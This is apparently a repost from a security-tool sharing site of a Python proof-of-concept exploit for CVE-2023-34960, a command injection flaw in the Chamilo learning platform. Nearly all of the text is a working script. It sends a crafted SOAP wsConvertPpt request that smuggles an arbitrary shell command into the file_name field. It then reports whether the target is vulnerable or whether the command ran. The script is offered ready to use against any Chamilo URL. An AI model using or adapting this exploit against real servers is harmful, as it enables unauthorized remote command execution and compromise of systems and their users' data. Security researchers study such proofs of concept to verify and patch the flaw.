CVE-2023-34960 Chamilo PoC
作者:Sec-Labs | 发布时间:
项目地址
https://github.com/Aituglo/CVE-2023-34960
POC
poc.py
import argparse
import requests
def execute_command(url, command):
body = '''<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">{}`.pptx</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>'''.format(url, command)
try:
response = requests.post('{}/main/webservices/additional_webservices.php'.format(url), data=body, headers={
'Content-Type': 'text/xml; charset=utf-8',
})
except:
return False
if response.status_code == 200 and "wsConvertPptResponse" in response.text:
return True
else:
return False
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="Url of your Chamilo", required=True)
parser.add_argument("-c", "--command", help="Command to execute", required=False)
args = parser.parse_args()
if args.command is None:
if execute_command(args.url, 'id'):
print(f"URL vulnerable: {args.url}")
else:
print(f"URL not vulnerable: {args.url}")
elif args.command is not None:
if execute_command(args.url, args.command):
print(f"Command executed: {args.command}")
else:
print(f"An error has occured, url is not vulnerable: {args.url}")
else:
print("Please specify a command to execute with -c or --command")
标签:工具分享, POC脚本